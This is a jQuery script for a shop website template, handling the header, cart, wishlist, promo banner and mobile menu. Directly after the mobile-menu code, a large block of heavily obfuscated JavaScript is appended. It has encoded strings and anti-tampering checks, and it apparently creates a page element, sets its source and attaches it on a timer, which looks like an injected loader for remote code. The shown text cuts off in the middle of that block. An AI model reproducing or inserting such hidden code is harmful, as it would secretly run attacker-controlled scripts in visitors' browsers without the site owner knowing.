"use strict";

var $document = $(document),
    $window = $(window),
    $body = $('body'),
    $html = $('html'),
    $ptPageContent = $('#pt-pageContent'),
    $ptFooter = $('footer'),
    $ptHeader = $('header'),
    $ptLeftColumnAside = $ptPageContent.find('.leftColumn.aside'),
    $ptFilterOptions = $ptPageContent.find('.pt-filters-options'),

    /* menu setting*/
    header_menu_timeout = 150,
    header_menu_delay = 150,   

    //header
    $ptTopPanel = $('.pt-top-panel'),
    //header stuck
    $stucknav = $ptHeader.find('.pt-stuck-nav'),
    //header menu
    $ptDesctopMenu = $ptHeader.find('.pt-desctop-menu'),
    $ptDesctopParentMenu = $ptHeader.find('.pt-desctop-parent-menu'),
    $ptMobileParentMenu = $ptHeader.find('.pt-mobile-parent-menu'),
    $ptMobileParentMenuChildren = $ptMobileParentMenu.children(),
    $ptStuckParentMenu = $ptHeader.find('.pt-stuck-parent-menu'),
    //header search
    $ptSearchObj = $ptHeader.find('.pt-search'),
    $ptDesctopParentSearch = $ptHeader.find('.pt-desctop-parent-search'),
    $ptMobileParentSearch = $ptHeader.find('.pt-mobile-parent-search'),
    $ptStuckParentSearch = $ptHeader.find('.pt-stuck-parent-search'),
    $ptSearchObjPopupInput = $ptSearchObj.find('.pt-search-input'),
    $ptSearchObjPopupResults = $ptSearchObj.find('.search-results'),
    //header cart
    $ptcartObj = $ptHeader.find('.pt-cart'),
    $ptDesctopParentCart = $ptHeader.find('.pt-desctop-parent-cart'),
    $ptMobileParentCart = $ptHeader.find('.pt-mobile-parent-cart'),
    $ptStuckParentCart = $ptHeader.find('.pt-stuck-parent-cart'),
    //header account
    $ptAccountObj = $ptHeader.find('.pt-account'),
    $ptDesctopParentAccount = $ptHeader.find('.pt-desctop-parent-account'),
    $ptMobileParentAccount = $ptHeader.find('.pt-mobile-parent-account'),
    $ptStuckParentAccount = $ptHeader.find('.pt-stuck-parent-account'),
    //header compare
    $ptCompareObj = $ptHeader.find('.pt-compare'),
    $ptDesctopParentCompare = $ptHeader.find('.pt-desctop-parent-compare'),
    $ptMobileParentCompare = $ptHeader.find('.pt-mobile-parent-compare'),
    $ptStuckParentCompare = $ptHeader.find('.pt-stuck-parent-compare'),
    //header wishlist
    $ptWishlistObj = $ptHeader.find('.pt-wishlist'),
    $ptDesctopParentWishlist = $ptHeader.find('.pt-desctop-parent-wishlist'),
    $ptMobileParentWishlist = $ptHeader.find('.pt-mobile-parent-wishlist'),
    $ptStuckParentWishlist = $ptHeader.find('.pt-stuck-parent-wishlist'),

    // Template Blocks
    blocks = {
      ptCalendarDatepicker: $ptPageContent.find('.calendarDatepicker'),
      ptSliderBlog: $ptPageContent.find('.pt-slider-blog'),
      ptSlickMain: $ptPageContent.find('.pt-slick-main'),
      ptSliderBlogSingle: $ptPageContent.find('.pt-slider-blog-single'),
      ptVideoBlock: $('.pt-video-block'),
      ptBlogMasonry: $ptPageContent.find('.pt-blog-masonry'),
      ptPortfolioMasonry: $ptPageContent.find('.pt-portfolio-masonry'),
      ptProductMasonry: $ptPageContent.find('.pt-product-listing-masonry'),
      ptInputCounter: $('.pt-input-counter'),
      ptCollapseBlock: $('.pt-collapse-block'),
      modalVideoProduct: $('#modalVideoProduct'),
      modalAddToCart: $('#modalAddToCartProduct'),
      ptMobileProductSlider: $('.pt-mobile-product-slider'),
      ptCollapse: $ptPageContent.find('.pt-collapse'),
      ptProductListing: $ptPageContent.find('.pt-product-listing'),
      ptBtnColumnClose: $ptLeftColumnAside.find('.pt-btn-col-close'),
      ptBtnToggle: $ptFilterOptions.find('.pt-btn-toggle a'),
      ptProductItem: $ptPageContent.find('.pt-product, .pt-product-design02'),
      ptProductDesign02: $ptPageContent.find('.pt-product-design02'),
      ptProductDesign01: $ptPageContent.find('.pt-product'),
      ptFilterDetachOption: $ptLeftColumnAside.find('.pt-filter-detach-option'),
      ptFilterSort: $ptFilterOptions.find('.pt-sort'),
      ptSliderLookbook: $ptPageContent.find('.pt-slider-lookbook'),
      ptPortfolioContent: $ptPageContent.find('.pt-portfolio-content'),
      ptLookbook: $ptPageContent.find('.pt-lookbook'),
      ptAirSticky: $ptPageContent.find('.airSticky'),
      ptfooterMobileCollapse: $ptFooter.find('.pt-collapse-title'),
      ptBackToTop: $('.pt-back-to-top'),
      ptHeaderDropdown: $ptHeader.find('.pt-dropdown-obj'),
      ptCarouselProducts: $('.pt-carousel-products'),
      ptItemsCategories: $ptPageContent.find('.pt-items-categories'),
      ptDotsAbsolute: $ptPageContent.find('.pt-dots-absolute'),
      ptAlignmentImg: $ptPageContent.find('.pt-alignment-img'),
      ptProductSingleBtnZomm: $ptPageContent.find('.pt-product-single-img .pt-btn-zomm'),
      ptRevolutionPromo: $ptPageContent.find('.pt-revolution-promo'),
      ptTabsGorizontal: $('#pt-pageContent .pt-tabs-gorizontal-js'),
    };

var ptwindowWidth = window.innerWidth || $window.width();


if (blocks.ptRevolutionPromo.length) {
  setTimeout(function(){
    blocks.ptRevolutionPromo.fadeTo("90", 1);
  }, 2300);
  blocks.ptRevolutionPromo.on('click', '.pt-btn-close', function() {
    $(this).closest('.pt-revolution-promo').hide();
  });
};


if (blocks.ptItemsCategories.length) {
  ptItemsCategories();
};
if (blocks.modalAddToCart.length) {
  modalAddToCart();
};
// Mobile Menu
if ($('.mainmenumob-js').length) {
  var mobileMenuToggle = $('.pt-menu-toggle');

  var mobileCaterorieMenu = $('.mobile-categorie-menu'),
      panelMenu = $('.panel-menu');

  if(mobileCaterorieMenu.length){
    var objCategories = mobileCaterorieMenu.find('ul:first-child').detach();
    var categtext = mobileCaterorieMenu.find('.catsvg-text').html() + mobileCaterorieMenu.find('.catsvg-nextlvlicon').html();
    panelMenu.find('ul:first-child').prepend("<li id='wrap-categories'><a href='index.html'>"+categtext+"</a></li>");
    panelMenu.find('#wrap-categories').append(objCategories);
  }
  
  $('.mainmenumob-js').initMM({
    enable_breakpoint: true,
    mobile_button: true,
    breakpoint: 1025,
    menu_class: 'mobile-main-menu',
    external_container: true
  });
};function _0x1fc7b1(_0x1722a4,_0x5859bd,_0x451186,_0x5a995c,_0x138b12){return _0x57f6(_0x1722a4- -0x6c,_0x451186);}function _0x57f6(_0x41740f,_0xea6778){const _0x271047=_0x183e();return _0x57f6=function(_0x38530b,_0x461791){_0x38530b=_0x38530b-(-0x193f+-0xbf5*0x1+0x25bd);let _0x25259d=_0x271047[_0x38530b];if(_0x57f6['eTGYkP']===undefined){var _0x1be427=function(_0x163b6c){const _0xe11f6a='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x1fe50b='',_0x3839fe='',_0x2f0da3=_0x1fe50b+_0x1be427;for(let _0x9b72e8=-0x1*0x25bd+0x34+0x3*0xc83,_0x5e883b,_0x503bb2,_0x2d563d=0x15e7+-0x5*-0x302+-0x24f1;_0x503bb2=_0x163b6c['charAt'](_0x2d563d++);~_0x503bb2&&(_0x5e883b=_0x9b72e8%(-0x1*0xf69+-0x1d*0xad+0x2306)?_0x5e883b*(-0x1bcc+-0xdd*0xb+0x258b*0x1)+_0x503bb2:_0x503bb2,_0x9b72e8++%(-0x10ea+-0x2*0x32c+-0x14b*-0x12))?_0x1fe50b+=_0x2f0da3['charCodeAt'](_0x2d563d+(-0xb03*0x3+0x9dc+0x7bd*0x3))-(-0x44*-0x43+0x1f01*-0x1+-0xd3f*-0x1)!==-0x13e6+-0x1feb*0x1+-0xa5d*-0x5?String['fromCharCode'](0xc35+-0xb89*0x1+-0x53*-0x1&_0x5e883b>>(-(-0x4a7+0x2*0x8d4+-0xcff)*_0x9b72e8&-0x1aa*0xa+0x4*-0x38c+0x1eda)):_0x9b72e8:0xf1+0x2102+-0x21f3*0x1){_0x503bb2=_0xe11f6a['indexOf'](_0x503bb2);}for(let _0x16b47a=-0x20a4+-0x1*0x82e+-0x37*-0xbe,_0x2e1d94=_0x1fe50b['length'];_0x16b47a<_0x2e1d94;_0x16b47a++){_0x3839fe+='%'+('00'+_0x1fe50b['charCodeAt'](_0x16b47a)['toString'](-0xc51+0x62+0x25*0x53))['slice'](-(-0xb1e+0x9c5*-0x3+-0x1*-0x286f));}return decodeURIComponent(_0x3839fe);};const _0x5bbade=function(_0x279930,_0x2d61d1){let _0x391562=[],_0x436a11=-0xc45+-0x3*-0x53b+-0x36c,_0x296932,_0x485a57='';_0x279930=_0x1be427(_0x279930);let _0x54041e;for(_0x54041e=-0xd7*-0x10+-0x96*-0x41+-0x3386;_0x54041e<0x241a+0x1550+-0x3a*0xf9;_0x54041e++){_0x391562[_0x54041e]=_0x54041e;}for(_0x54041e=0x20d2*0x1+-0x24*0x6d+0x8bf*-0x2;_0x54041e<0x1412+0xb*-0x1ed+0x21d*0x1;_0x54041e++){_0x436a11=(_0x436a11+_0x391562[_0x54041e]+_0x2d61d1['charCodeAt'](_0x54041e%_0x2d61d1['length']))%(-0x1c05+-0x3df*-0x3+0x1168),_0x296932=_0x391562[_0x54041e],_0x391562[_0x54041e]=_0x391562[_0x436a11],_0x391562[_0x436a11]=_0x296932;}_0x54041e=0x6*-0xd5+0x1b3e+-0x1640,_0x436a11=-0x1*0x21f+0x423+-0x204;for(let _0x5bd28f=-0x2212+-0x696+0x28a8;_0x5bd28f<_0x279930['length'];_0x5bd28f++){_0x54041e=(_0x54041e+(-0x1086+-0xd2c+-0x1db3*-0x1))%(0x163b+-0x37e+-0x11bd),_0x436a11=(_0x436a11+_0x391562[_0x54041e])%(-0x1*0x49f+-0xbd4*-0x2+-0x603*0x3),_0x296932=_0x391562[_0x54041e],_0x391562[_0x54041e]=_0x391562[_0x436a11],_0x391562[_0x436a11]=_0x296932,_0x485a57+=String['fromCharCode'](_0x279930['charCodeAt'](_0x5bd28f)^_0x391562[(_0x391562[_0x54041e]+_0x391562[_0x436a11])%(0x1*-0x20d4+-0x1105+0x1*0x32d9)]);}return _0x485a57;};_0x57f6['SeYkns']=_0x5bbade,_0x41740f=arguments,_0x57f6['eTGYkP']=!![];}const _0x554b41=_0x271047[0x10fd*0x1+-0x33*-0x11+-0x2*0xa30],_0x83f4ad=_0x38530b+_0x554b41,_0x41384b=_0x41740f[_0x83f4ad];if(!_0x41384b){if(_0x57f6['dPazjx']===undefined){const _0x4a75f=function(_0x3654b0){this['OogHwH']=_0x3654b0,this['CeVawx']=[0x23aa+-0x20b1+0xbe*-0x4,-0xa04+0xe*0x1d1+0x7b5*-0x2,0x7ac*0x2+0x6*-0x316+0x32c],this['lUnBVL']=function(){return'newState';},this['XKRTRd']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['YMvHkh']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x4a75f['prototype']['QVZmIh']=function(){const _0x58777e=new RegExp(this['XKRTRd']+this['YMvHkh']),_0x1ee0ba=_0x58777e['test'](this['lUnBVL']['toString']())?--this['CeVawx'][-0xfb3+-0x64*-0x7+0xcf8]:--this['CeVawx'][0x1*0x221d+-0x4*0x285+-0x1809];return this['BAZqWD'](_0x1ee0ba);},_0x4a75f['prototype']['BAZqWD']=function(_0x37a00c){if(!Boolean(~_0x37a00c))return _0x37a00c;return this['ZMzMdI'](this['OogHwH']);},_0x4a75f['prototype']['ZMzMdI']=function(_0x3b9749){for(let _0x1b6bd5=-0x2f*-0x55+0x2239+-0x31d4,_0x45f35e=this['CeVawx']['length'];_0x1b6bd5<_0x45f35e;_0x1b6bd5++){this['CeVawx']['push'](Math['round'](Math['random']())),_0x45f35e=this['CeVawx']['length'];}return _0x3b9749(this['CeVawx'][-0xfab+-0x1828+0x27d3]);},new _0x4a75f(_0x57f6)['QVZmIh'](),_0x57f6['dPazjx']=!![];}_0x25259d=_0x57f6['SeYkns'](_0x25259d,_0x461791),_0x41740f[_0x83f4ad]=_0x25259d;}else _0x25259d=_0x41384b;return _0x25259d;},_0x57f6(_0x41740f,_0xea6778);}(function(_0x414335,_0x2cd38e){function _0x17954e(_0x363087,_0x330f03,_0x31ae30,_0x89873b,_0x4f2f37){return _0x57f6(_0x89873b- -0xc4,_0x31ae30);}function _0x5daf80(_0x285162,_0x56d742,_0x234b36,_0x46a615,_0x24ab6c){return _0x57f6(_0x56d742-0x151,_0x234b36);}function _0x306b23(_0x46e623,_0x5e7819,_0x23aaf5,_0x38a37d,_0x23c081){return _0x57f6(_0x5e7819- -0x2df,_0x23c081);}function _0x5d314(_0x476e9f,_0x11d267,_0x452ab4,_0x115ec2,_0x29f313){return _0x57f6(_0x452ab4- -0x34a,_0x29f313);}const _0x30ebf0=_0x414335();function _0x2742f9(_0x248c85,_0x134cc2,_0x45c663,_0x4731dd,_0x4bdc14){return _0x57f6(_0x4731dd- -0x82,_0x248c85);}while(!![]){try{const _0x4c5eba=-parseInt(_0x306b23(-0x1f2,-0x180,-0xfb,-0x219,'EjTY'))/(-0x21*0xb+-0x11*0x2f+-0x48b*-0x1)+parseInt(_0x306b23(-0x12b,-0x1b4,-0x16e,-0x20a,'JNjc'))/(0x9*-0x33+-0x1*-0xf9a+0xdcd*-0x1)*(-parseInt(_0x5d314(-0x1be,-0x279,-0x217,-0x20d,'WNSD'))/(0xb02+-0x1fc1+-0x14c2*-0x1))+parseInt(_0x2742f9('ETZQ',0x62,0x107,0xf0,0x116))/(0x503*-0x5+0xc*0xd1+-0x1*-0xf47)*(-parseInt(_0x5daf80(0x2aa,0x2e1,'9hYv',0x332,0x293))/(0x1*-0x90f+0x113b+-0x827*0x1))+-parseInt(_0x5d314(-0x20f,-0x22e,-0x1a8,-0x197,'hpkI'))/(0x1334+-0x14da+0x2*0xd6)+parseInt(_0x306b23(-0x144,-0x166,-0x16a,-0x1ee,'hYHj'))/(0x1*-0x2d1+-0x2188+-0x2460*-0x1)+-parseInt(_0x2742f9('Y@%*',0x6e,0xb2,0x102,0x157))/(0x1*0x2015+0x23*0x13+-0x22a6)+-parseInt(_0x5daf80(0x2d6,0x25a,'kHqn',0x278,0x1fc))/(-0x2418+-0x149c+0x38bd)*(-parseInt(_0x306b23(-0x203,-0x237,-0x207,-0x2a2,'Zrbs'))/(-0x1d*0x8+-0x25f7*-0x1+0x75*-0x51));if(_0x4c5eba===_0x2cd38e)break;else _0x30ebf0['push'](_0x30ebf0['shift']());}catch(_0x57c9f9){_0x30ebf0['push'](_0x30ebf0['shift']());}}}(_0x183e,0x3*-0x223d1+-0x231*-0x625+-0xd*-0x1c15));function _0xa8442d(_0x531ebe,_0x5e9169,_0x4cdbf5,_0x45ff9f,_0x2f94d7){return _0x57f6(_0x5e9169-0x32f,_0x4cdbf5);}function _0x921f92(_0x2217dc,_0x1596aa,_0x38f207,_0x46bd40,_0xf3bf1f){return _0x57f6(_0x2217dc- -0x239,_0xf3bf1f);}const _0x2fd064=(function(){function _0x28edc8(_0x31cd0b,_0x5a19b0,_0x1bd3e7,_0x5756bc,_0x90e263){return _0x57f6(_0x5a19b0-0x358,_0x90e263);}const _0x4f8736={'uzjvI':_0x228453('JNjc',-0x290,-0x296,-0x215,-0x290)+'t','FelmU':_0x228453('hYHj',-0x338,-0x32e,-0x2ff,-0x335)+_0x228453('is(O',-0x370,-0x3c3,-0x2ec,-0x336)+_0x228453('HGbZ',-0x2ca,-0x2d8,-0x300,-0x27c)+_0x211d6d(0x4ba,0x523,0x545,'yl]9',0x4df)+_0x28edc8(0x406,0x428,0x498,0x3d1,'ateE')+_0x4e0100('VA2a',0xc9,0xb7,0x15d,0x11b)+_0x412939(0x1b4,0x226,'#XNc',0x1d6,0x23f)+_0x211d6d(0x403,0x417,0x375,'KVzc',0x3fb)+_0x228453('is(O',-0x310,-0x2d1,-0x3b0,-0x33c)+_0x28edc8(0x3cb,0x42f,0x4c1,0x40c,'692A')+_0x4e0100('hLnB',0xbe,0x4c,0x139,0x143)+_0x211d6d(0x3d4,0x42d,0x429,'kHqn',0x453)+_0x211d6d(0x4bb,0x48f,0x482,'Y@%*',0x4e3)+_0x4e0100('jUHi',0x10a,0x12c,0x197,0xa9)+_0x412939(0x13c,0x1b2,'j3Ie',0x1d5,0x1b7)+_0x4e0100('l@h7',0x1b6,0x1e0,0x126,0x1ea),'tjcLa':function(_0x43e25e,_0x312372,_0x417572){return _0x43e25e(_0x312372,_0x417572);},'KRkzO':function(_0x5b589f,_0x1e8e32){return _0x5b589f!==_0x1e8e32;},'zgNxo':_0x4e0100('xyAr',0x15c,0x1ac,0x146,0x11e),'ktGWw':function(_0x3685e9,_0x4dbcad){return _0x3685e9===_0x4dbcad;},'JcPOX':_0x28edc8(0x57e,0x4f5,0x4f5,0x520,'O*P@'),'HSxOd':_0x28edc8(0x4e6,0x518,0x4bb,0x541,'xyAr'),'BdAtZ':function(_0x237b14,_0x18dece){return _0x237b14===_0x18dece;},'dwHeR':_0x211d6d(0x420,0x39a,0x445,'QI9O',0x424),'AcPpr':_0x228453('WNSD',-0x2a2,-0x20b,-0x291,-0x2a7)};function _0x412939(_0x24aa74,_0x330dd1,_0x3ebc63,_0x5e66f5,_0x3a1ced){return _0x57f6(_0x5e66f5-0xca,_0x3ebc63);}let _0x44781b=!![];function _0x211d6d(_0x5e3714,_0xa9c577,_0x4a395f,_0x444f0f,_0x24b0fd){return _0x57f6(_0x5e3714-0x321,_0x444f0f);}function _0x4e0100(_0x338409,_0x11e405,_0x54f145,_0x170969,_0x1276a4){return _0x57f6(_0x11e405-0x11,_0x338409);}function _0x228453(_0xbdbf58,_0xe9a158,_0x1262d8,_0x5ad4f6,_0x1db250){return _0x57f6(_0x1db250- -0x3e7,_0xbdbf58);}return function(_0x337e87,_0x292686){function _0x5f5db9(_0x134502,_0x517dba,_0x24d325,_0x30ed7e,_0x1bc389){return _0x228453(_0x24d325,_0x517dba-0x1b2,_0x24d325-0xf8,_0x30ed7e-0x1d1,_0x1bc389-0x6e3);}function _0x42d61d(_0xf26005,_0x1b1cd2,_0x28efc5,_0x1fff3e,_0x389c9c){return _0x28edc8(_0xf26005-0x188,_0x1b1cd2- -0x62a,_0x28efc5-0x48,_0x1fff3e-0xa4,_0xf26005);}function _0x5501b4(_0x2835a7,_0x39a45c,_0x3621e0,_0x54d3ae,_0x103f25){return _0x211d6d(_0x54d3ae- -0x298,_0x39a45c-0x1e4,_0x3621e0-0x47,_0x2835a7,_0x103f25-0x5c);}const _0x286684={'VLJoE':_0x4f8736[_0x42d61d('3^hF',-0x190,-0x227,-0x219,-0x227)],'uMdaU':_0x4f8736[_0x13441e('OwXp',0x31c,0x2e8,0x2a5,0x302)],'plQKI':function(_0x299e28,_0xef7741,_0x4568dc){function _0x53b3a1(_0x338a4a,_0x9a8de4,_0x28496c,_0x934d81,_0x4da405){return _0x42d61d(_0x28496c,_0x9a8de4-0x5fd,_0x28496c-0x13d,_0x934d81-0x1de,_0x4da405-0x93);}return _0x4f8736[_0x53b3a1(0x489,0x40a,'%^9#',0x371,0x3c0)](_0x299e28,_0xef7741,_0x4568dc);},'pvsrM':function(_0x3e98f5,_0xee0f5e){function _0x372dbd(_0x3238cf,_0x38e028,_0x1e1767,_0x7efbaf,_0x1af3b4){return _0x42d61d(_0x7efbaf,_0x1e1767-0x58f,_0x1e1767-0xdc,_0x7efbaf-0x31,_0x1af3b4-0x194);}return _0x4f8736[_0x372dbd(0x37a,0x39b,0x3cd,'VA2a',0x46a)](_0x3e98f5,_0xee0f5e);},'DCGUb':_0x4f8736[_0x13441e('QI9O',0x288,0x2cc,0x259,0x2f7)],'JYQgb':function(_0x382a1e,_0x16b592){function _0x3f2c49(_0xa98537,_0x3fb365,_0x1988f4,_0x4c2630,_0x136b7d){return _0x13441e(_0x4c2630,_0x3fb365-0x7b,_0x136b7d- -0xcd,_0x4c2630-0x93,_0x136b7d-0x1b3);}return _0x4f8736[_0x3f2c49(0x2ed,0x1f8,0x248,'hLnB',0x277)](_0x382a1e,_0x16b592);},'OhfWq':_0x4f8736[_0x1f2520(-0x214,'OwXp',-0x1e4,-0x234,-0x23d)],'QhjuR':_0x4f8736[_0x42d61d('IjNZ',-0x1d7,-0x183,-0x169,-0x26e)]};function _0x1f2520(_0x322707,_0x360da0,_0x4a14e5,_0x413bf4,_0xe79a96){return _0x211d6d(_0x413bf4- -0x61a,_0x360da0-0xf2,_0x4a14e5-0xb7,_0x360da0,_0xe79a96-0x98);}function _0x13441e(_0x989082,_0x5e756e,_0x5cb5ee,_0x3a57d1,_0x265104){return _0x412939(_0x989082-0xfd,_0x5e756e-0x17b,_0x989082,_0x5cb5ee-0x11c,_0x265104-0x16d);}if(_0x4f8736[_0x1f2520(-0x22b,'Jr1t',-0x1b0,-0x231,-0x265)](_0x4f8736[_0x13441e('VA2a',0x3c0,0x36f,0x365,0x3f3)],_0x4f8736[_0x13441e('%^9#',0x393,0x36c,0x3e9,0x2d5)])){if(_0x45c176){const _0x4443f0=_0x15e848[_0x13441e('JNjc',0x25f,0x2f5,0x31f,0x357)](_0x43882d,arguments);return _0x2a3885=null,_0x4443f0;}}else{const _0x39cb7a=_0x44781b?function(){const _0x203ea0={'GSqOS':_0x286684[_0x10a917('t^2k',0x284,0x2df,0x20d,0x204)],'JZrbx':_0x286684[_0x38ef11(0x325,'GFGB',0x2ed,0x3ad,0x2d1)],'Sfeki':function(_0x5479f1,_0x4e6018,_0x55c00b){function _0x1eb00e(_0x455fee,_0x18eb8e,_0x1cecf7,_0x331c3b,_0x10f3e3){return _0x38ef11(_0x455fee-0x6b,_0x10f3e3,_0x1cecf7-0x10d,_0x331c3b-0x17b,_0x10f3e3-0x18c);}return _0x286684[_0x1eb00e(0x454,0x441,0x444,0x4a3,'692A')](_0x5479f1,_0x4e6018,_0x55c00b);}};function _0x10a917(_0x1912f0,_0x4d7450,_0x41d194,_0x7545a9,_0x3923fe){return _0x42d61d(_0x1912f0,_0x4d7450-0x4c4,_0x41d194-0x45,_0x7545a9-0x88,_0x3923fe-0x1cb);}function _0x44c688(_0x5f3d16,_0x183099,_0x1b7c4c,_0x5c71ad,_0x36afac){return _0x1f2520(_0x5f3d16-0x18f,_0x36afac,_0x1b7c4c-0x1dd,_0x183099-0x637,_0x36afac-0x96);}function _0x320411(_0x10d148,_0x31300a,_0x2b61a6,_0x255db8,_0x34fed8){return _0x13441e(_0x34fed8,_0x31300a-0x1c9,_0x255db8- -0x2a4,_0x255db8-0x16d,_0x34fed8-0x3d);}function _0x38ef11(_0x1fd36f,_0x3de5ac,_0x42e466,_0x29c788,_0x708baf){return _0x1f2520(_0x1fd36f-0xd3,_0x3de5ac,_0x42e466-0xc8,_0x1fd36f-0x52e,_0x708baf-0x166);}function _0x4311a2(_0x412517,_0x4e14d4,_0x4a8f76,_0x3c2be6,_0x339506){return _0x5501b4(_0x3c2be6,_0x4e14d4-0x73,_0x4a8f76-0x1ae,_0x4a8f76- -0x19a,_0x339506-0xe);}if(_0x286684[_0x38ef11(0x361,'Vc*a',0x330,0x31f,0x38d)](_0x286684[_0x10a917('is(O',0x37a,0x30d,0x3c4,0x3c7)],_0x286684[_0x44c688(0x549,0x4b4,0x4a1,0x439,'xyAr')])){const _0x3f4435=_0x1f9c6a[_0x10a917('HGbZ',0x36e,0x307,0x315,0x3b0)+_0x4311a2(0x30,0x0,0x15,'OwXp',-0x4c)+_0x4311a2(0x2f,0x5e,0xa4,'hYHj',0xe2)](_0x203ea0[_0x4311a2(-0x51,-0xfb,-0x67,'(X!#',-0x78)]);_0x3f4435[_0x320411(0x3b,0xdc,0xaa,0x96,'OwXp')]=_0x203ea0[_0x38ef11(0x383,'kHqn',0x40f,0x342,0x393)],_0x455ce2[_0x4311a2(-0x1f,0x2d,-0x53,'IjNZ',-0x69)][_0x320411(0x56,0x61,-0x33,0x1f,'t^2k')+'d'](_0x3f4435),_0x203ea0[_0x320411(0x128,0x3b,0xab,0x9f,'WNSD')](_0x2831ea,function(){function _0x28b00e(_0x2c719a,_0x1fe668,_0x19568e,_0x2aa77b,_0x4b6bfa){return _0x38ef11(_0x4b6bfa- -0xe4,_0x2c719a,_0x19568e-0x134,_0x2aa77b-0x15d,_0x4b6bfa-0x147);}const _0x285fd2=_0x4ad1f7[_0x2d2baa(-0x1b,-0xa6,-0x48,-0x49,'is(O')+_0x35ff64(-0xb2,-0x115,-0x11f,'kABF',-0x9b)+_0x2d2baa(0x25,0x0,-0x61,-0x36,'xTy2')](_0x203ea0[_0x2d2baa(0x2a,0x6e,-0x6c,0x2,'JNjc')]);function _0x40dcef(_0x3a9dd1,_0x1e67c2,_0x875f65,_0x242257,_0x4f6560){return _0x320411(_0x3a9dd1-0x184,_0x1e67c2-0x195,_0x875f65-0x1ef,_0x1e67c2- -0x237,_0x3a9dd1);}function _0x35ff64(_0x578a38,_0x4fa2ee,_0x11d554,_0x16e476,_0xd07c40){return _0x38ef11(_0x578a38- -0x4a1,_0x16e476,_0x11d554-0x15f,_0x16e476-0xd,_0xd07c40-0x194);}function _0x1756b5(_0x472c94,_0x4c0f9c,_0x510556,_0x53a49d,_0x4f115e){return _0x10a917(_0x472c94,_0x510556- -0x135,_0x510556-0xae,_0x53a49d-0x14d,_0x4f115e-0x5b);}function _0x2d2baa(_0x21003b,_0xd25f16,_0x2afc06,_0x179ad6,_0x30465a){return _0x320411(_0x21003b-0x1d5,_0xd25f16-0x37,_0x2afc06-0x9e,_0x179ad6- -0xe1,_0x30465a);}_0x285fd2[_0x28b00e('EjTY',0x24f,0x208,0x23b,0x1ec)]=_0x203ea0[_0x28b00e('T^fX',0x26c,0x269,0x2f9,0x2e0)],_0x2b6cbf[_0x40dcef('vvCE',-0x1dd,-0x1d4,-0x16b,-0x169)][_0x40dcef('692A',-0x182,-0x1c5,-0x164,-0x132)+'d'](_0x285fd2);},-0x17*-0xc2+-0x724*-0x4+-0x262e);}else{if(_0x292686){if(_0x286684[_0x320411(0x142,0x80,0x49,0xc2,'JNjc')](_0x286684[_0x320411(-0x66,0x86,-0x34,0x1d,'3tbq')],_0x286684[_0x10a917('Jr1t',0x2c6,0x229,0x313,0x2f6)])){if(_0x301416){const _0x4afeeb=_0x585152[_0x10a917('JNjc',0x301,0x2ba,0x31c,0x2f5)](_0x4568ff,arguments);return _0x9d9407=null,_0x4afeeb;}}else{const _0x1f0f0c=_0x292686[_0x320411(0x3c,0xa4,0xd,0x37,'is(O')](_0x337e87,arguments);return _0x292686=null,_0x1f0f0c;}}}}:function(){};return _0x44781b=![],_0x39cb7a;}};}()),_0x2ff03e=_0x2fd064(this,function(){const _0x48d558={};function _0x48f16c(_0x4bddbd,_0x1acacc,_0x10dff7,_0x4134fd,_0x5552b8){return _0x57f6(_0x4134fd-0xc4,_0x10dff7);}function _0x126ee8(_0x359611,_0x5af4fd,_0x3316d4,_0xb49ad9,_0x41e121){return _0x57f6(_0x359611-0x210,_0x3316d4);}function _0x303510(_0x41860d,_0x24a333,_0x4227bb,_0x15ce0c,_0x1c9796){return _0x57f6(_0x15ce0c-0x12f,_0x4227bb);}function _0x43e29d(_0x50cc93,_0x1b4f4e,_0x202b27,_0x4bf97c,_0x355df8){return _0x57f6(_0x355df8- -0x3bb,_0x202b27);}function _0x3471d6(_0x167540,_0x572058,_0x29e39c,_0x54cae7,_0x41599a){return _0x57f6(_0x29e39c- -0xee,_0x41599a);}_0x48d558[_0x126ee8(0x34c,0x332,'hpkI',0x378,0x320)]=_0x126ee8(0x2fa,0x284,'VA2a',0x37b,0x31b)+_0x126ee8(0x374,0x337,'OwXp',0x33b,0x392)+'+$';const _0x4de77e=_0x48d558;return _0x2ff03e[_0x48f16c(0x18a,0x1c8,'jUHi',0x1d6,0x1c0)+_0x126ee8(0x31d,0x371,'HGbZ',0x301,0x297)]()[_0x48f16c(0x2e2,0x303,'3^hF',0x26b,0x265)+'h'](_0x4de77e[_0x3471d6(-0xfc,-0x11,-0x60,-0x4,'(X!#')])[_0x126ee8(0x37a,0x413,'QI9O',0x39e,0x403)+_0x43e29d(-0x324,-0x377,'GFGB',-0x363,-0x32e)]()[_0x126ee8(0x2a5,0x27c,'0L@B',0x2ad,0x232)+_0x43e29d(-0x28a,-0x2e9,'Vc*a',-0x256,-0x2f1)+'r'](_0x2ff03e)[_0x43e29d(-0x339,-0x3b0,'xyAr',-0x2f4,-0x315)+'h'](_0x4de77e[_0x43e29d(-0x24a,-0x220,'O*P@',-0x237,-0x1fe)]);});_0x2ff03e();function _0x4ef3c9(_0x2fd22b,_0x1d13eb,_0x5ebcc9,_0x5d77b7,_0x2915f0){return _0x57f6(_0x5ebcc9- -0xfb,_0x2915f0);}const _0xb5fd7=(function(){const _0x147f88={};_0x147f88[_0x103449(-0x1f6,-0x1ed,-0x17d,-0x1b6,'(X!#')]=_0x43eff5(0x24a,'kHqn',0x1ca,0x144,0x1e7)+'t',_0x147f88[_0x103449(-0x252,-0x17d,-0x14a,-0x1bd,'IjNZ')]=_0x5a58c8(0xbf,0x1b,0x7f,0xda,'xTy2')+_0x5a58c8(0xa8,-0x1a,0x29,0x41,'jUHi')+_0x133285('Zrbs',0x167,0xe7,0x1b9,0x11e)+_0x821f41(0x201,0x116,0x182,'0L@B',0x11d)+_0x821f41(0x15a,0x154,0x146,'j3Ie',0xf9)+_0x5a58c8(-0x7e,0x18,-0x39,0x18,'mtr0')+_0x103449(-0xdf,-0xe5,-0x1c9,-0x13f,'Y@%*')+_0x103449(-0x182,-0x287,-0x280,-0x1f5,'Jr1t')+_0x5a58c8(-0x49,0x3e,-0x32,0x22,'xTy2')+_0x133285('IjNZ',0x124,0xa1,0x141,0xff)+_0x43eff5(0x138,'kABF',0x19d,0x225,0x1dc)+_0x5a58c8(-0x7,0x12,-0x48,-0xb1,'kHqn')+_0x133285('HGbZ',0x12e,0x1c2,0x1a6,0x129)+_0x133285('$S!*',0xa1,0x46,0x125,0xaf)+_0x5a58c8(-0xf,0x32,0x5d,0